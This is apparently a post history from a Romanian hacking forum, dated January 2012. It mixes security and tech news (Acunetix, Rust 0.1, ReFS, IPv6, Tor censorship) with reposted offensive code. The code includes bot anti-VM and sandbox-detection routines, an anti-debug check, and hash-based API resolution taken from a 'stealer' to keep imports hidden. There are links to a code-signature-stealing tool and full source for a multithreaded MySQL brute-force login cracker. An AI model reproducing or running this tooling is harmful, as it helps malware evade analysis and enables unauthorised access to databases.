Nytro

Acunetix Web Vulnerability Scanner By MaxiSoler on 28 January 2012 in Tools with No Comments Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing. Improvements: The accuracy of Script Checks has been increased. The Acunetix development team is dedicated to continuously improve scan detection of security checks. The Graphical User Interface (GUI) has been enhanced in order to make menu navigation and usage easier and more effective than ever before. SSL security audit script is launched automatically when scanning a HTTPS website, regardless if port scanning is enabled or not. Added a number of new SQL Injection variants checks. Bug Fixes: HPP detection security script failed when testing input scheme with excluded variants Apply settings button not showing up in specific cases Fixed several issues related to pausing and resuming of crawler Fixed several issues when running multiple instances of the reporter Two backup files were being generated because of filename case insensitivity Filtering of wildcards from robots.txt This release candidate of Acunetix Web Vulnerability Scanner Version 8 is considered complete, stable, and suitable for testing. More Information: Acunetix v8 Manual Download Acunetix Web Vulnerability Scanner v8 RC Sursa: IT Vulnerability & ToolsWatch | Acunetix Web Vulnerability Scanner v8 Released Candidate Released

[h=2]Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++[/h]By Sebastian Anthony on January 24, 2012 at 6:52 am After more than five years in the pipeline, Mozilla Labs and the Rust community have released the first alpha — version 0.1 — of the Rust programming language compiler. The Rust language emphasizes concurrency and memory safety, and — if everything goes to plan — is ultimately being groomed to replace C++ as Mozilla’s compiled language of choice. Browser prototypes programmed in Rust will eventually emerge, and then one day Firefox — or parts of Firefox — might be re-written in Rust. A bit more about the language itself: Rust is a compiled, statically-typed, object-oriented programming language (and objects are immutable by default). The compiler is supported on Windows, Linux, and Mac. Feature-wise, Rust intentionally avoids any novel ideas, and instead builds upon existing, known features that are present in other languages. Syntax-wise, Rust uses curly braces {} like C, C++, or JavaScript, but as you can see in the code block below, the syntax is actually quite funky. [INDENT]use std; fn main(args: [str]) { std::io::println("hello world from '" + args[0] + "'!"); } [/INDENT] At this point we have to compare Rust to Go, Google’s new language. The Rust community explicitly says that it was not inspired by Go — development of Rust began before Go — but that other languages made by Rob Pike such as Newsqueak, Alef, and Limbo were influential. Feature-wise, the languages are quite similar, but Rust seems to be more security- and safety-oriented. Where Go has global garbage collection, null pointers, and shared mutable states, Rust GC is optional and per-task, null pointers are not allowed, and objects are immutable by default. As far as the state of the language is concerned, most of its features work but are incomplete. Standard library APIs are subject to change. Performance isn’t yet up to scratch (eventually it should be as fast as C++). In other words, you can dive in and play with Rust, but future versions of the compiler will break your code. To get started, hit up the Rust language website — or read the Rust 0.1 release notes Sursa: Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++ | ExtremeTech

MediaFire: "Suntem o companie americana si respectam legile americane". (ceva de genul) O sa continue sa ofere servicii de hosting.

La munca, nu la intins mana. Fara astfel de rahaturi aici, o sa ramaneti intreaga viata niste hoti. Sper sa putreziti in puscarie. Ban permanent.

Ah, stiam ca a mai fost postat, dar credeam ca versiunea in limba germana, de aceea am postat.

Vedeti asta: [h=1]Linux Local Privilege Escalation via SUID /proc/pid/mem Write[/h]

Tot pe aceasta ramura: [h=2]Anti-Debug trick[/h] defs.h NtCreateEventPair( OUT PHANDLE IN ACCESS_MASK IN POBJECT_ATTRIBUTES EventPairHandle, DesiredAccess, ObjectAttributes OPTIONAL ); typedef struct _DEBUG_EVENT { LIST_ENTRY EventList; KEVENT ContinueEvent; CLIENT_ID ClientId; PEPROCESS Process; PETHREAD Thread; NTSTATUS Status; ULONG Flags; PETHREAD BackoutThread; DBGKM_MSG ApiMsg; } DEBUG_EVENT, *PDEBUG_EVENT; typedef struct _DBGKM_MSG { PORT_MESSAGE h; DBGKM_APINUMBER ApiNumber; ULONG ReturnedStatus; union { DBGKM_EXCEPTION Exception; DBGKM_CREATE_THREAD CreateThread; DBGKM_CREATE_PROCESS CreateProcess; DBGKM_EXIT_THREAD ExitThread; DBGKM_EXIT_PROCESS ExitProcess; DBGKM_LOAD_DLL LoadDll; DBGKM_UNLOAD_DLL UnloadDll; }; } DBGKM_MSG, *PDBGKM_MSG; detect.c #define WIN32_LEAN_AND_MEAN #include <stdio.h> #include <stdlib.h> #include <windows.h> #include "defs.h" #pragma comment(lib,"ntdll.lib") #pragma comment(lib,"psapi.lib") void QueryProcessHeapMethod(void) { PDEBUG_BUFFER buffer; buffer = RtlCreateQueryDebugBuffer(0,FALSE); RtlQueryProcessHeapInformation(buffer); if (buffer->RemoteSectionBase == (PVOID) 0x50000062) MessageBoxA(NULL,"Debugged","Warning",MB_OK); else MessageBoxA(NULL,"Not Debugged","Warning",MB_OK); if (buffer->EventPairHandle == (PVOID) 0x00002b98) MessageBoxA(NULL,"Debugged","Warning",MB_OK); else MessageBoxA(NULL,"Not Debugged","Warning",MB_OK); printf("EventPairHandle= %x",(int)buffer->EventPairHandle); } int main() { QueryProcessHeapMethod(); } Sursa (cu alte informatii utile): Anti-Debug trick

In sfarsit cineva care posteaza lucruri extrem de utile si de interesante. Desigur, pentru ce interesati.

[h=1][C#] Digitally Sign App & Steal Signature[/h]This is a quick draft of stealing a signature from a signed app, and signing your own app w/ the signature. Author: Exidous Download (x86 si x64): http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=12100 http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=12110 Va faceti si voi cont: http://www.hackhound.org/forum/topic/42544-c-digitally-sign-app-steal-signature/

[h=1][C++] Anti-VMWare[/h]Author: _Carb0n_ #include "../Headers/includes.h" #include "../Headers/functions.h" #ifndef NO_ANTIVM DWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep) { PCONTEXT ctx = ep->ContextRecord; ctx->Ebx = -1; // Not running VPC ctx->Eip += 4; // skip past the "call VPC" opcodes return EXCEPTION_CONTINUE_EXECUTION; } bool DetectVPC() { bool bVPCIsPresent = FALSE; __try { _asm push ebx _asm mov ebx, 0 // It will stay ZERO if VPC is running _asm mov eax, 1 // VPC function number _asm __emit 0Fh _asm __emit 3Fh _asm __emit 07h _asm __emit 0Bh _asm test ebx, ebx _asm setz [bVPCIsPresent] _asm pop ebx } __except(IsInsideVPC_exceptionFilter(GetExceptionInformation())) { } #ifdef DEBUG if (bVPCIsPresent==TRUE) DebugMsg("Bot is under VPC !"); else DebugMsg("Bot is not running under VPC !"); #endif return bVPCIsPresent; } bool DetectVMWare() { bool bVMWareIsPresent = TRUE; __try { __asm { push edx push ecx push ebx mov eax, 'VMXh' mov ebx, 0 // any value but not the MAGIC VALUE mov ecx, 10 // get VMWare version mov edx, 'VX' // port number in eax, dx // read port // on return EAX returns the VERSION cmp ebx, 'VMXh' // is it a reply from VMWare? setz [bVMWareIsPresent] // set return value pop ebx pop ecx pop edx } } __except(EXCEPTION_EXECUTE_HANDLER) { bVMWareIsPresent = FALSE; } #ifdef DEBUG if (bVMWareIsPresent==TRUE) DebugMsg("Bot is under VMWare !"); else DebugMsg("Bot is not running under VMWare !"); #endif return bVMWareIsPresent; } bool DetectAnubis() { char szBotFile[MAX_PATH]; bool bAnubisIsPresent = FALSE; if (strstr(szBotFile, "C:InsideTm")) bAnubisIsPresent = TRUE; #ifdef DEBUG if (bAnubisIsPresent==TRUE) DebugMsg("Bot is running under Anubis !"); else DebugMsg("Bot is not running under Anubis !"); #endif return bAnubisIsPresent; } bool IsProcessRunningUnderVM() { bool bVMWare; bool bVPC; bool bAnubis; bVMWare = DetectVMWare(); bVPC = DetectVPC(); bAnubis = DetectAnubis(); if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE) return TRUE; return FALSE; } #endif Sursa: http://www.hackhound.org/forum/topic/893-c-anti-vmware/

[C] Dynamic API calling Author: /* Calling Windows API without using any API. 32bit version. Tested on Win7 x64. by January, 2012. This is how I've been doing my API calling for years. I believe I first started doing it with the Ju u stealer. Using an array of function pointers and an array of hashes for each library, I find it much easier to gather all of the necessary API pointers than doing 1 function call for each API I want to use. Or doing a function call every time I want to use an API. get_k32base() has been changed from what it used to be because I found it was no longer working on my win7. I do not guarantee it's effectiveness on other OS's. #trinity OG production. Fuck your crew. */ #include <windows.h> //I didn't have the header for these two structs so that's why they're here... typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; SHORT LoadCount; SHORT TlsIndex; LIST_ENTRY HashTableEntry; ULONG TimeDateStamp; } LDR_MODULE, *PLDR_MODULE; //definitions for API we are importing. typedef HMODULE (WINAPI *LoadLibraryW_)(LPCWSTR lpLibFileName); typedef int (WINAPI *MessageBoxW_)(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType); typedef int (WINAPI *MessageBoxA_)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType); //hashes for API we are importing. #define dwLoadLibraryW 0x5FBFF111 #define dwMessageBoxW 0x384F14CA #define dwMessageBoxA 0x384F14B4 //function pointers for API we are importing. static LoadLibraryW_ LLW; static MessageBoxW_ MBW; static MessageBoxA_ MBA; //Arrays for API we are importing. //Must have a corresponding array of hashes and addresses function pointers for each library. //Kernel32 //Yes, I know it's dumb to have an array of 1 element...but that's just how the function works. //This could be redone so that you don't need the Kernel32Hashes array but it's in here for uniformity. static const DWORD Kernel32Hashes[] = { dwLoadLibraryW }; static LPVOID* Kernel32Ptrs[] = { (LPVOID*)&LLW }; //User32 //MessageBoxW AND MessageBoxA?!? Yeah... I didn't have any better ideas for a simple example. static const DWORD User32Hashes[] = { dwMessageBoxW, dwMessageBoxA }; static LPVOID* User32Ptrs[] = { (LPVOID*)&MBW, (LPVOID*)&MBA }; //code.. int _lstrcmpW_(LPCWSTR str1, LPCWSTR str2) /* lstrcmpW replacement function so that there is no unnecessary imports in the IAT. this doesn't behave exactly as lstrcmpW but I don't need it to I just needed it to tell if two strings are the same, I don't care what the numerical difference is. It would be advisable to turn this into something that compares the hash of the two strings but its whatevs. inputs: two null terminated, wide character strings. outputs: 0 if strings are the same, else -1. */ { if (*str1 == 0 || *str2 == 0) return -1; while (*str1 && *str2) { if (*str1 != *str2) return -1; str1++; str2++; } if (*str1 || *str2) return -1; return 0; } DWORD DJBHash(LPCSTR str) /* not by me. old, simple hashing function, don't know the real author. modified to specifically hash null terminated ASCII strings. inputs: null terminated string. outputs: 32-bit hash of input null terminated string. */ { DWORD hash = 5381; for(; *str; str++) { hash = ((hash << 5) + hash) + (*str); } return hash; } LPVOID GetAPI_FROM_DJB(const LPVOID library, const DWORD APIHASH) /* GetProcAddress replacement. Uses hashes of api names instead of strings. inputs: library = handle or base address to library (DLL) currently loaded in memory. APIHASH = hash of API name we are searching for. outputs: on success: pointer to library function that can be called from a function pointer. on error: NULL. */ { PIMAGE_EXPORT_DIRECTORY lExport; DWORD x; if (library) { lExport = (PIMAGE_EXPORT_DIRECTORY)((DWORD)library + ((PIMAGE_NT_HEADERS)((DWORD)library + ((PIMAGE_DOS_HEADER)library)->e_lfanew))->OptionalHeader.DataDirectory[0].VirtualAddress); DWORD *Names = (DWORD*)((DWORD)library + lExport->AddressOfNames); WORD *Ordinals = (WORD*)((DWORD)library + lExport->AddressOfNameOrdinals); DWORD *Functions = (DWORD*)((DWORD)library + lExport->AddressOfFunctions); for (x = 0; x < lExport->NumberOfNames; x++) { if (DJBHash((char*)(Names[x] + (DWORD)library)) == APIHASH) return (LPVOID)(Functions[Ordinals[x]] + (DWORD)library); } } return NULL; } LPVOID get_k32base() /* The assembly code is not mine, just modified from an old source by drn. I believe it was originally by Vecna or somebody. inputs: none, obviously. outputs: base address of kernel32.dll (if you are using windows2000 this will fail if kernel32 is not already linked in the import table, due to bug in win2k.) */ { LPVOID k32base = NULL; PLDR_MODULE lm, lol; __asm { pushad xor eax, eax mov eax, fs:[eax+30h] mov eax, [eax+0ch] mov esi, [eax+0ch] lodsd mov [lm], eax popad } lol = lm; while (true) { if (!lm->BaseDllName.Buffer) break; if (_lstrcmpW_(L"kernel32.dll", lm->BaseDllName.Buffer) == 0) { k32base = lm->BaseAddress; break; } lm = (PLDR_MODULE)lm->InLoadOrderModuleList.Flink; if (lm == lol || !lm) //don't wanna loop infinitely if user is on win2k or some future Windows that doesn't explicitly link kernel32. break; } return k32base; } void fillAPIPtrs(const LPVOID DllBase, const DWORD dwNumFuncs, const DWORD *HashArray, LPVOID **PtrArray) /* Will fill an array of pointers to API from within a given library. inputs: DllBase: Base address of library we are searching. dwNumFuncs: Number of members in HashArray and PtrArray. Basically the number of API we are searching for in the library. HashArray: Array of DWORDS that are corresponding hashes for pointers to be filled in PtrArray. Must be same size as PtrArray. PtrArray: Array of function pointers to be filled. Must be same size as HashArray. outputs: none, fills PtrArray with (hopefully) valid pointers to desired API. */ { DWORD i; for (i = 0; i < dwNumFuncs; i++) *PtrArray[i] = GetAPI_FROM_DJB(DllBase, HashArray[i]); } int main() { LPVOID k32; LPVOID user32; k32 = get_k32base(); fillAPIPtrs(k32, sizeof(Kernel32Hashes) / sizeof(DWORD), Kernel32Hashes, Kernel32Ptrs); if (LLW) { user32 = LLW(L"user32"); if (user32) { fillAPIPtrs(user32, sizeof(User32Hashes) / sizeof(DWORD), User32Hashes, User32Ptrs); if (MBW && MBA) { if (MBW(NULL, L":D", L"Hello World!", MB_YESNO) == IDYES) MBA(NULL, "Party All the Time", "\\o/", MB_OK); else MBA(NULL, "y u gay?", "D:", MB_OK); } } } return 0; } Sursa: http://www.hackhound.org/forum/topic/43503-dynamic-api-calling/

[h=1]28C3: How governments have tried to block Tor (en)[/h] For more information visit: 28C3: speakers To download the video visit: Documentation - 28C3 public wiki Playlist 28C3: 28C3: Behind Enemy Lines - YouTube Speakers: Jacob Appelbaum | Roger Dingledine Iran blocked Tor handshakes using Deep Packet Inspection (DPI) in January 2011 and September 2011. Bluecoat tested out a Tor handshake filter in Syria in June 2011. China has been harvesting and blocking IP addresses for both public Tor relays and private Tor bridges for years. Roger Dingledine and Jacob Appelbaum will talk about how exactly these governments are doing the blocking, both in terms of what signatures they filter in Tor (and how we've gotten around the blocking in each case), and what technologies they use to deploy the filters -- including the use of Western technology to operate the surveillance and censorship infrastructure in Tunisia (Smartfilter), Syria (Bluecoat), and other countries. We'll cover what we've learned about the mindset of the censor operators (who in many cases don't want to block Tor because they use it!), and how we can measure and track the wide-scale censorship in these countries. Last, we'll explain Tor's development plans to get ahead of the address harvesting and handshake DPI arms races. Link: Tocmai l-am vazut, e ceva ce trebuie vazut, ce s-a intamplat in Iran, China, Siria, Tunisia, Egipt se poate intampla si la noi, si e bine sa stim ce se intampla, ce se poate face pentru monitorizarea traficului.

Ai nevoie de host? Nu ai bani din chestiile private si unice si smechere pe care le ai, probabil gasite de tine? Sa fim seriosi, e o porcarie ideea.

Hackerii care stiu sa descarce LOIC si sa dea un click. Profesionisti.

E scanf, citeste. Returneaza 0 in caz de eroare, ceea ce probabil se intampla si aici, sau numarul de chestii citite. Aici, citeste "%d" + 2. Acel "%d" e in memorie % d NULL, deci practic e un: scanf(NULL); adica returneaza 0. Oricum nu e afisat nimic, dar asa functioneaza.

"dfsdfdsf" - sir de caractere, pointer la sir de caractere terminat in NULL "%d" - idem mai sus "%d" + 2 - idem mai sus, +2 la adresa pointerului

Ai incercat pe o versiune mai veche de kernel? Kernelul are suport pentru "promiscuous mode"? Poate IOCTL-ul SIOCSIFFLAGS nu e folosit cum trebuie, poate au fost facute modificari pe versiunile mai noi de kernel, desi nu cred... Am citit putin, si pare ceva legat de modul in care se seteaza placa de retea in "promiscuous mode", fie cu ifconfig, fie programabil, cu acest IOCTL, dar nu am timp acum sa citesc si nu cred ca as gasi ceva concret.

Da, dragut, speram sa aflu cate ceva despre exploit-ul in sine. Am citit "povestea" unui stack overflow intr-un alt tip de fisier, tot in VLC, si e extrem de interesant, cum a fost gasit acel stack overflow si cum s-a putut exploata. Si nu e deloc simplu. Oricum, VLC are un parser pentru formatele de fisiere, si cred ca ar trebui sa mearga pentru orice extensie a acelui fisier. De asemenea, VLC parca avea si un plugin pentru Mozilla, oare se va executa payload-ul daca acel fisier e pus intr-un HTML sa fie vizualizat in browser?

Sincer, nu m-a impresionat nimic.

MySQL Brute Force Tool Authored by James Stevenson | Site stev.org Posted Jan 19, 2012 This is a small MySQL cracking tool capable of running login attempts from multiple threads in parallel. It is capable of 1024 concurrent connections. /* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Library General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $ * * Author: * NAME: James Stevenson * WWW: http://www.stev.org * */ #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <getopt.h> #include <string.h> #include <pthread.h> #include <mysql/mysql.h> int verbose = 0; int total = 0; volatile int quit = 0; pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER; struct args { char *host; char *db; int port; }; void print_help(FILE *fp, char *app) { fprintf(fp, "Usage: %s [<options>]\n", app); fprintf(fp, "\n"); fprintf(fp, " -h Print this help and exit\n"); fprintf(fp, " -v Verbose. Repeat for more info\n"); fprintf(fp, " -t <host> host to try\n"); fprintf(fp, " -p <port> port to connect on\n"); fprintf(fp, " -n <num> number of threads to use\n"); fprintf(fp, "\n"); fprintf(fp, "Note: usernames / password will be read from stdin\n"); fprintf(fp, "The format for this is username:password\n"); fprintf(fp, "\n"); } int try(char *hostname, char *username, char *password, char *db, int port) { MYSQL mysql; mysql_init(&mysql); if (!mysql_real_connect(&mysql, hostname, username, password, db, port, NULL, 0)) { switch(mysql_errno(&mysql)) { case 1045: /* ER_ACCESS_DENIED_ERROR */ if (verbose >= 1) printf("Failed: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql)); break; default: printf("Unknown Error: %d -> %s\n", mysql_errno(&mysql), mysql_error(&mysql)); break; } return 0; } if (verbose >= 1) printf("Success: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql)); mysql_close(&mysql); return 1; } int getpassword(char **buf, size_t *buflen, char **username, char **password) { pthread_mutex_lock(&mutex_pass); if (getline(buf, buflen, stdin) >= 0) { pthread_mutex_unlock(&mutex_pass); char *tmp = strchr(*buf, ':'); if (tmp == 0 || tmp[1] == 0) return 0; *username = *buf; *tmp = 0; tmp++; *password = tmp; tmp = strchr(*password, '\n'); if (tmp != 0) *tmp = 0; if (verbose >= 2) printf("username: %s password: %s\n", *username, *password); return 1; } pthread_mutex_unlock(&mutex_pass); return 0; } void *run(void *p) { struct args *a = (struct args *) p; char *buf = 0; size_t buflen = 0; char *user = 0; char *pass = 0; while(quit == 0) { if (getpassword(&buf, &buflen, &user, &pass) == 0) goto free; /* we ran out of passwords */ if (try(a->host, user, pass, a->db, a->port)) { printf("Success! Username: %s Password: %s\n", user, pass); quit = 1; goto free; } } free: if (buf != NULL) free(buf); pthread_exit(NULL); return NULL; } int main(int argc, char **argv) { struct args args; pthread_t *thd; pthread_attr_t attr; int nthreads = 1; int i = 0; int c; memset(&args, 0, sizeof(args)); while( (c = getopt(argc, argv, "d:hn:p:t:v")) != -1) { switch(c) { case 'd': args.db = optarg; break; case 'h': print_help(stdout, argv[0]); exit(EXIT_SUCCESS); break; case 'n': nthreads = atoi(optarg); break; case 't': args.host = optarg; break; case 'v': verbose++; break; case 'p': args.port = atoi(optarg); break; } } if (args.db == NULL) args.db = "mysql"; if (args.host == NULL) args.host = "localhost"; thd = malloc(nthreads * sizeof(*thd)); if (!thd) { perror("malloc"); exit(EXIT_FAILURE); } mysql_library_init(0, NULL, NULL); if (pthread_attr_init(&attr) != 0) { perror("pthread_attr_init"); exit(EXIT_FAILURE); } if (pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE) != 0) { perror("pthread_attr_setdetachstate"); exit(EXIT_FAILURE); } for(i=0;i<nthreads;i++) { if (pthread_create(&thd[i], NULL, run, &args) != 0) { perror("pthread_create"); exit(EXIT_FAILURE); } } for(i=0;i<nthreads;i++) { if (pthread_join(thd[i], NULL) != 0) { perror("pthread_join"); exit(EXIT_FAILURE); } } pthread_attr_destroy(&attr); free(thd); mysql_library_end(); return EXIT_SUCCESS; } Sursa: MySQL Brute Force Tool ? Packet Storm

Cauta cartea "Java de la 0 la expert", am vazut-o pe la Diverta parca. Acopera mult din ceea ce inseamna Java si e explicata pas cu pas. Inca o data spun, cred ca e printre cele mai bune carti pe care le-am citit. PS: Sfatul meu e sa nu te angajezi, nu intr-un domeniu despre care nu stii foarte multe pentru ca e posibil sa nu iti placa. Cel mai bine cauti un job cu limbajul de programare care iti place.

MD5 = 32 caractere in hex, are 16 bytes Caractere alfa-numerice: 62 (a-z, A-Z, 0-9) Dimensiune parola: 6 caractere Combinatii posibile: 62 ^ 6 Bytes necesari: 62 ^ 6 * 16 = 908803769344 bytes = 846 TB Sper ca nu am gresit la calculate. Nu te poti baza doar pe cuvinte de dictionar. Practic cred ca 80% dintre parole NU sunt cuvinte de dictionar. Bine, 10% dintre ele sunt: "123456", "qwerty"... Ganditi-va si voi la toate parolele pe care le aveti. Cate sunt cuvinte de dictionar?

Azi s-a atins numarul de 300.000 de posturi. Nu e nimic important, dar e frumos statistic. "Threads: 43,813, Posts: 300,077, Members: 54,770" Totusi, nu e importanta cantitatea, importanta e calitatea. Singura parte urata e ca aproximativ 85.000 de posturi sunt la Offtopic. Sa speram ca pe viitor va creste atat cantitatea, cat si calitatea posturilor, ca membrii se vor axa mai mult pe discutii tehnice si ca nu se vor pierde in teme OTV-iste populand cu zeci de pagini topicuri penibile. Sa speram ca numarul tutorialelor si a discutiilor stric legate de domeniile pe care forumul vrea sa le acopere va creste semnificativ si ca numarul membrilor interesati de acumularea unor noi cunostinte va exploda. // Muie SOPA

[h=1]Cum arata noul sistem de fisiere Windows 8 (servere)[/h]de Liviu Petrescu | 18 ianuarie 2012 Pana acum, Windows 8 a atras interesul presei prin interfata Metro. Noul sistem de operare Microsoft va oferi si un nou sistem de fisiere, ce va fi disponibil doar in varianta Windows Server 8. Pe baza cunoscutului NTFS, dezvoltatorii au creat ReFS (Resilient File System) ce va fi introdus initial doar in versiunea pentru servere a Windows 8, scrie MaximumPC. Creat de la zero, sistemul ReFS pastreaza o mare parte dintre functionalitatile NTFS, dar a fost descris ca mult mai rezistent. Imbunatatirile aduse prin noul sistem ReFS includ verificarea si corectarea a automata a datelor stocate. Sistemul va opera orice rectificare "live", fara sa aiba nevoie de trecerea in mod offline. ReFS va oferi si integritate meta data cu checksums, suport pentru volume mari de fisiere si foldere si verificarea automata a hard disk-urilor pentru eliminarea erorilor latente. Sursa: Cum arata noul sistem de fisiere Windows 8 (servere) | Hit.ro

[h=1]6 iunie, data la care lumea trece la IPv6[/h]de Liviu Petrescu | 18 ianuarie 2012 Infrastructura Internetului este pe cale de a suporta un upgrade major. In data de 6 iunie 2012, Internet Protocol version 4 va incepe sa fie abandonat in favoarea lui IPv6. O mare parte dintre companiile telecom, dintre producatorii de echipamente de networking si dintre companiile de web au ales data de 6 iunie 2012 pentru implementarea IPv6, potrivit Slashdot. Versiunea actuala a Internet Protocol permite conectatarea la retea a aproximativ 4,3 miliarde de statii, numar ce se apropie rapid de limita superioara. IPv6 va "extinde" internetul, dar data de 6 iunie este doar primul pas. Operatorii telecom au promis ca minim 1% dintre utilizatorii rezidentiali vor incepe sa acceseze site-urile compatibile la aceasta data, numarul lor urmand sa creasca tot mai repede. Google, Facebook si Bing se numara printre companiile care sustin upgrade-ul rapid al infrastructurii internetului. Trecerea la IPv6 a fost testata pentru o zi de multe companii in data de 8 iunie 2011, dar cele mai multe au revenit la IPv4. De aceasta data, trecerea va fi ireversibila. Sursa: 6 iunie, data la care lumea trece la IPv6 | Hit.ro